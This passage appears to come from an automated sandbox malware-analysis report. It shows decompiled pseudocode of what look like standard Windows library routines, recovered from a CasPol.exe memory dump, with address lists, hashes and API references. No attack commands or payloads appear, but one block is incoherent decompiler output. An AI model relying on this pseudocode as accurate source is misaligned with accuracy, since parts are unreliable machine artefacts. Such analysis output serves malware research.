						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x015fb94c
0x015fb956
0x015fb95c
0x015fb95e
0x015fb964
0x015fb969
0x015fb96d
0x015fb96d
0x015fb970
0x015fb974
0x015fb97a
0x015fbadf
0x015fbadf
0x015fbae2
0x015fbae4
0x015fbae6
0x015fbaf0
0x01642cb8
0x015fbaf6
0x015fbaf6
0x015fbaf6
0x015fbafd
0x015fbb1f
0x015fbb1f
0x015fbaff
0x015fbb00
0x015fbb00
0x015fbb03
0x015fbb03
0x015fbacb
0x015fbacf
0x015fbad0
0x015fbad1
0x015fbadc
0x015fbadc
0x015fb980
0x015fb980
0x015fb988
0x015fb98b
0x015fb98d
0x015fb990
0x015fb993
0x015fb999
0x015fb99b
0x015fb9a1
0x015fb9a5
0x015fb9aa
0x015fb9b0
0x015fb9bb
0x015fb9c0
0x015fb9c3
0x015fb9ca
0x015fb9cc
0x015fb9cf
0x015fb9d3
0x015fb9d7
0x015fba94
0x015fba94
0x015fba98
0x015fbaa3
0x01642ccb
0x015fbaa9
0x015fbaa9
0x015fbaa9
0x015fbab1
0x01642cd5
0x01642cdd
0x01642cdd
0x015fbabb
0x015fbabc
0x015fbac2
0x015fbac3
0x015fbac3
0x015fbac6
0x00000000
0x015fb9dd
0x015fb9dd
0x015fb9e7
0x015fb9e7
0x015fb9ec
0x015fb9ec
0x015fb9f1
0x015fb9f5
0x015fb9fa
0x015fba00
0x015fba0c
0x015fba10
0x015fba10
0x015fba12
0x015fba18
0x00000000
0x00000000
0x015fbb26
0x015fbb26
0x015fba1e
0x015fba1e
0x015fba23
0x015fba25
0x015fba2c
0x015fba30
0x015fba35
0x015fba35
0x015fba41
0x015fba46
0x015fba4c
0x015fba50
0x015fba54
0x015fba6a
0x015fba6e
0x015fba70
0x015fba74
0x015fba78
0x015fba7a
0x015fba7c
0x015fba8e
0x015fba90
0x015fba92
0x015fbb14
0x015fbb14
0x015fbb16
0x015fbb16
0x00000000
0x015fba7c
0x015fbb0a
0x015fbb0d
0x00000000
0x00000000
0x00000000
0x015fbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015FB9A5

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 80a0987aba6b080b6a5e77df7734dc4f6eabaa3b850eb28793fcee3c30e02fb0
Instruction ID: 09b043664e1d8841b01b348a4103456c1176fbd0b14ee8f0900f783dabc1df4f
Opcode Fuzzy Hash: 80a0987aba6b080b6a5e77df7734dc4f6eabaa3b850eb28793fcee3c30e02fb0
Instruction Fuzzy Hash: DD515871A08351CFC720DF29C88092ABBF9FB88650F54896EF6D58B355D771E844CB92

Uniqueness

Uniqueness Score: -1.00%

Function 015DB171 Relevance: 1.7, APIs: 1, Instructions: 166
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 78%

			E015DB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x16af7a8);
				E0162D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0162D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0161D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0161F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0162DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0161B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0161B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0161E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0161A890() != 0) {
					goto L6;
				}
				goto L3;
			}

0x015db171
0x015db171
0x015db171
0x015db171
0x015db171
0x015db176
0x015db17b
0x015db180
0x015db186
0x015db18f
0x015db198
0x015db1a4
0x015db1aa
0x01634802
0x01634802
0x01634805
0x0163480c
0x0163480e
0x015db1d1
0x015db1d3
0x015db1de
0x015db1de
0x01634817
0x0163481e
0x01634820
0x01634822
0x01634822
0x01634824
0x01634824
0x0163482a
0x00000000
0x00000000
0x01634835
0x0163483a
0x0163483d
0x0163483f
0x01634842
0x01634842
0x01634842
0x01634846
0x0163484c
0x0163484e
0x01634851
0x01634851
0x01634853
0x01634854
0x01634854
0x01634858
0x0163485a
0x0163485a
0x0163485d
0x0163485f
0x01634861
0x01634861
0x01634866
0x0163486b
0x0163486e
0x01634871
0x01634876
0x01634876
0x01634878
0x0163487b
0x01634884
0x01634884
0x00000000
0x0163487d
0x0163487d
0x01634882
0x01634889
0x01634889
0x0163488f
0x01634891
0x016348e0
0x016348e2
0x016348e4
0x016348e4
0x016348e7
0x016348e7
0x016348ed
0x016348f4
0x016348f6
0x01634951
0x01634951
0x01634953
0x01634953
0x01634956
0x01634956
0x01634958
0x01634959
0x01634959
0x0163495d
0x0163495d
0x0163495f
0x0163495f
0x01634965
0x01634969
0x016349ba
0x016349ba
0x016349c1
0x016349c5
0x016349cc
0x016349d4
0x016349d7
0x016349da
0x016349e4
0x016349e5
0x016349f3
0x01634a02
0x00000000
0x01634a02
0x01634972
0x01634974
0x00000000
0x00000000
0x01634976
0x01634979
0x01634982
0x01634983
0x01634984
0x0163498b
0x0163498d
0x01634991
0x01634993
0x01634999
0x0163499d
0x016349a2
0x016349a2
0x016349a2
0x01634999
0x016349ac
0x00000000
0x016349b3
0x016348f8
0x016348fe
0x00000000
0x00000000
0x00000000
0x016348fe
0x01634895
0x0163489c
0x016348ad
0x016348b2
0x016348b5
0x016348b7
0x016348ba
0x016348bc
0x016348c6
0x016348c6
0x016348cb
0x016348d1
0x016348d4
0x016348d8
0x016348d8
0x00000000
0x016348d8
0x016348be
0x016348c0
0x00000000
0x00000000
0x016348c2
0x00000000
0x00000000
0x00000000
0x016348c4
0x00000000
0x01634882
0x0163487b
0x01634904
0x01634906
0x00000000
0x00000000
0x01634908
0x0163490e
0x00000000
0x00000000
0x01634910
0x01634917
0x01634917
0x00000000
0x01634917
0x015db1ba
0x016347f9
0x016347fc
0x00000000
0x00000000
0x00000000
0x016347fc
0x015db1c0
0x015db1c0
0x015db1c3
0x015db1cb
0x00000000
0x00000000
0x00000000

APIs

_vswprintf_s.LIBCMT ref: 016348AD

Memory Dump Source

Source File: 00000001.00000002.309591080.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_15b0000_CasPol.jbxd

Similarity

API ID: _vswprintf_s
String ID:
API String ID: 677850445-0
Opcode ID: eae94769b25d5b825a8ded6f722f6ceb94dc515631aa1362c1a00b7dbebc509d
Instruction ID: 301ea1b47e1453a931983f06d7146620624904e6b26166a23fe0900cffe2ae46
Opcode Fuzzy Hash: eae94769b25d5b825a8ded6f722f6ceb94dc515631aa1362c1a00b7dbebc509d
Instruction Fuzzy Hash: 2651C071D002598EEB31CF688C44BAEFBB1BF85710F1541ADD859AB382DB748945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01602581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E01602581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t235;
				signed int _t239;
				char* _t240;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				intOrPtr _t275;
				signed int _t277;
				signed int _t279;
				void* _t280;
				void* _t281;
				signed int _t282;
				unsigned int _t285;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t295;
				intOrPtr _t307;
				signed int _t316;
				signed int _t318;
				signed int _t319;
				signed int _t323;
				signed int _t324;
				intOrPtr* _t326;
				signed int _t328;
				signed int _t330;
				signed int _t333;
				void* _t334;
				void* _t336;

				_t330 = _t333;
				_t334 = _t333 - 0x4c;
				_v8 =  *0x16cd360 ^ _t330;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t323 = 0x16cb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t285 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t275 = 0x48;
				_t305 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t316 = 0;
				_v37 = _t305;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t324 = 0xc0000106;
						goto L32;
					} else {
						_t323 = L015F4620(_t285,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t323;
						__eflags = _t323;
						if(_t323 == 0) {
							_t324 = 0xc0000017;
							goto L32;
						} else {
							 *(_t323 + 0x44) =  *(_t323 + 0x44) & 0x00000000;
							_t50 = _t323 + 0x48; // 0x48
							_t318 = _t50;
							_t305 = _v32;
							 *((intOrPtr*)(_t323 + 0x3c)) = _t275;
							_t277 = 0;
							 *((short*)(_t323 + 0x30)) = _v48;
							__eflags = _t305;
							if(_t305 != 0) {
								 *(_t323 + 0x18) = _t318;
								__eflags = _t305 - 0x16c8478;
								 *_t323 = ((0 | _t305 == 0x016c8478) - 0x00000001 & 0xfffffffb) + 7;
								E0161F3E0(_t318,  *((intOrPtr*)(_t305 + 4)),  *_t305 & 0x0000ffff);
								_t305 = _v32;
								_t334 = _t334 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t318 = _t318 + (( *_t305 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E016639F2(_t318);
									_t305 = _v32;
									_t318 = _t269;
								}
							}
							_t289 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t324 = _v68;
								__eflags = 0;
								 *((short*)(_t318 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t323 + _t277 * 4;
								_v56 = _t279;
								do {
									__eflags = _t305;
									if(_t305 != 0) {
										_t235 =  *(_v60 + _t289 * 4);
										__eflags = _t235;
										if(_t235 == 0) {
											goto L30;
										} else {
											__eflags = _t235 == 5;
											if(_t235 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t289 * 4);
										 *(_t279 + 0x18) = _t318;
										_t239 =  *(_v60 + _t289 * 4);
										__eflags = _t239 - 8;
										if(_t239 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t239 * 4 +  &M01602959))) {
												case 0:
													__ax =  *0x16c8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0161F3E0(__edi,  *0x16c848c, __ax & 0x0000ffff);
														__eax =  *0x16c8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0161F3E0(_t318, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x16c8480 & 0x0000ffff = E0161F3E0(__edi,  *0x16c8484,  *0x16c8480 & 0x0000ffff);
													__eax =  *0x16c8480 & 0x0000ffff;
													__eax = ( *0x16c8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0161F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0161F3E0(_t318, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t334 = _t334 + 0xc;
													_t318 = _t318 + (_t264 >> 1) * 2 + 2;
													__eflags = _t318;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t318 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx =  *0x16c575c;
													__eflags = __ebx - 0x16c575c;
													if(__ebx != 0x16c575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0161F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x16c575c;
														} while (__ebx != 0x16c575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x16c8478 & 0x0000ffff = E0161F3E0(__edi,  *0x16c847c,  *0x16c8478 & 0x0000ffff);
													__eax =  *0x16c8478 & 0x0000ffff;
													__eax = ( *0x16c8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E016639F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x16c6e58 & 0x0000ffff = E0161F3E0(__edi,  *0x16c6e5c,  *0x16c6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x16c6e58 & 0x0000ffff;
													__eax = ( *0x16c6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t289 = _v16;
													_t305 = _v32;
													L29:
													_t279 = _t279 + 4;
													__eflags = _t279;
													_v56 = _t279;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t289 = _t289 + 1;
									_v16 = _t289;
									__eflags = _t289 - _v48;
								} while (_t289 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t239 =  *(_v60 + _t316 * 4);
						if(_t239 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t239 * 4 +  &M01602935))) {
							case 0:
								__ax =  *0x16c8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t305 =  &_v64;
								_v80 = E01602E3E(0,  &_v64);
								_t275 = _t275 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x16c8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16c8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E015EEEF0(0x16c79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E015EEB70(__ecx, 0x16c79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t213 = _v72;
											__eflags = _t213;
											if(_t213 != 0) {
												L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t213);
											}
											_t214 = _v52;
											__eflags = _t214;
											if(_t214 != 0) {
												__eflags = _t324;
												if(_t324 < 0) {
													L015F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t214);
													_t214 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t285 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x16c7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L015F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E015EEB70(__ecx, 0x16c79a0);
										__eax = _v52;
										L36:
										_pop(_t317);
										_pop(_t325);
										__eflags = _v8 ^ _t330;
										_pop(_t276);
										return E0161B640(_t214, _t276, _v8 ^ _t330, _t305, _t317, _t325);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t271 = _v56;
								if(_v56 != 0) {
									_t305 =  &_v36;
									_t273 = E01602E3E(_t271,  &_v36);
									_t285 = _v36;
									_v76 = _t273;
								}
								if(_t285 == 0) {
									goto L44;
								} else {
									_t275 = _t275 + 2 + _t285;
								}
								goto L14;
							case 6:
								__eax =  *0x16c5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x16c8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x16c8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x16c6e58 & 0x0000ffff;
								__eax = ( *0x16c6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t316 = _t316 + 1;
								if(_t316 >= _v48) {
									goto L16;
								} else {
									_t305 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t290 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("pushad");
					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t334;
					asm("pushad");
					_t240 = _t239 + _t334;
					asm("daa");
					asm("pushad");
					 *_t323 =  *_t323 + _t330;
					asm("pushad");
					 *((intOrPtr*)(_t323 + 0x28)) =  *((intOrPtr*)(_t323 + 0x28)) + _t240;
					asm("pushad");
					 *0x1f016026 =  *0x1f016026 + _t240;
					_pop(_t280);
					 *[fs:eax+ebp+0x5b350160] =  *[fs:eax+ebp+0x5b350160] + _t305;
					 *[fs:edx] =  *[fs:edx] + _t240;
					 *((intOrPtr*)(_t240 + 1)) =  *((intOrPtr*)(_t240 + 1)) - _t334;
					 *_t240 =  *_t240 - 0x60;
					_t326 = _t323 + _t323;
					asm("daa");
					asm("pushad");
					 *_t326 =  *_t326 + _t280;
					 *((intOrPtr*)(_t240 + 1)) =  *((intOrPtr*)(_t240 + 1)) - _t240;
					_t327 = _t326 - 1;
					 *((intOrPtr*)(_t240 + 1)) =  *((intOrPtr*)(_t240 + 1)) - _t240;
					asm("daa");
					asm("pushad");
					_pop(_t281);
					 *[fs:eax+ebp+0x5c340160] =  *[fs:eax+ebp+0x5c340160] + _t326 - 1;
					_t336 = _t334 + _t290;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x16aff00);
					E0162D08C(_t281, _t318, _t327);
					_v44 =  *[fs:0x18];
					_t319 = 0;
					 *_a24 = 0;
					_t282 = _a12;
					__eflags = _t282;
					if(_t282 == 0) {
						_t244 = 0xc0000100;
					} else {
						_v8 = 0;
						_t328 = 0xc0000100;
						_v52 = 0xc0000100;
						_t246 = 4;
						while(1) {
							_v40 = _t246;
							__eflags = _t246;
							if(_t246 == 0) {
								break;
							}
							_t295 = _t246 * 0xc;
							_v48 = _t295;
							__eflags = _t282 -  *((intOrPtr*)(_t295 + 0x15b1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t261 = E0161E5C0(_a8,  *((intOrPtr*)(_t295 + 0x15b1668)), _t282);
									_t336 = _t336 + 0xc;
									__eflags = _t261;
									if(__eflags == 0) {
										_t328 = E016551BE(_t282,  *((intOrPtr*)(_v48 + 0x15b166c)), _a16, _t319, _t328, __eflags, _a20, _a24);
										_v52 = _t328;
										break;
									} else {
										_t246 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t246 = _t246 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t328;
						__eflags = _t328;
						if(_t328 < 0) {
							__eflags = _t328 - 0xc0000100;
							if(_t328 == 0xc0000100) {
								_t291 = _a4;
								__eflags = _t291;
								if(_t291 != 0) {
									_v36 = _t291;
									__eflags =  *_t291 - _t319;
									if( *_t291 == _t319) {
										_t328 = 0xc0000100;
										goto L76;
									} else {
										_t307 =  *((intOrPtr*)(_v44 + 0x30));
										_t248 =  *((intOrPtr*)(_t307 + 0x10));
										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t291;
										if( *((intOrPtr*)(_t248 + 0x48)) == _t291) {
											__eflags =  *(_t307 + 0x1c);
											if( *(_t307 + 0x1c) == 0) {
												L106:
												_t328 = E01602AE4( &_v36, _a8, _t282, _a16, _a20, _a24);
												_v32 = _t328;
												__eflags = _t328 - 0xc0000100;
												if(_t328 != 0xc0000100) {
													goto L69;
												} else {
													_t319 = 1;
													_t291 = _v36;
													goto L75;
												}
											} else {
												_t251 = E015E6600( *(_t307 + 0x1c));
												__eflags = _t251;
												if(_t251 != 0) {
													goto L106;
												} else {
													_t291 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t328 = E01602C50(_t291, _a8, _t282, _a16, _a20, _a24, _t319);
											L76:
											_v32 = _t328;
											goto L69;
										}
									}
									goto L108;
								} else {
									E015EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t328 = _a24;
									_t258 = E01602AE4( &_v36, _a8, _t282, _a16, _a20, _t328);
									_v32 = _t258;
									__eflags = _t258 - 0xc0000100;
									if(_t258 == 0xc0000100) {
										_v32 = E01602C50(_v36, _a8, _t282, _a16, _a20, _t328, 1);
									}
									_v8 = _t319;
									E01602ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t244 = _t328;
					}
					L70:
					return E0162D0D1(_t244);
				}
				L108:
			}

0x01602584
0x01602586
0x01602590
0x01602596
0x01602597
0x01602598
0x01602599
0x0160259e
0x016025a4
0x016025a9
0x016025ac
0x016025ae
0x016025b1
